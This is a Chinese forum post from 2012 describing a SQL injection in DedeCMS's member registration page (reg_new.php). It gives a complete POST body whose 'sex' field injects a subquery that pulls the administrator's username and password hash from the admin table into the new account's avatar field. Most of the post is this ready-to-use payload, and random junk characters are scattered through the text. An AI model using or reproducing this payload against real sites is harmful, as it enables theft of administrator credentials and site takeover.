dedecms版本 20121122+ `/ I9 ~+ I3 J4 @/ N0 Z
; d; B, A- o3 U7 A. e4 Z. ]需要magic_quotes_gpc=Off# m0 Y: t0 k0 k/ }
4 T- y. c' U4 j" Y) N7 W3 b应该是没有什么大危害的漏洞.# W; L% C' B% j( r, A9 T2 V
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
" H7 v! B0 f& F3 ?- O2 B9 A) E# z4 }2 @8 d4 Y0 X8 n" K5 ?
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
! b7 c, R, b E T! cPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
/ G5 z I2 q S( @0 @/ E" W9 _! a% P
http:///de/member/reg_new.php
* Q7 X* ^/ h: a8 M! `& C/ I: d6 E, O1 {* P
POST! X& V; n/ d7 O1 B% y1 V) f
0 u% X/ f K; C8 K8 H# Wdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=9 J& d( N( y+ a* _0 |
, c$ t) m& @- U& I o9 Q4 S7 ~* @成功注册后,头像处里面有好玩的信息.7 R7 A6 n$ v+ N* x9 J4 e) @ L
6 T" d( H" [: y( G f
|
发表于 2012-12-5 10:03:32
收藏
支持
反对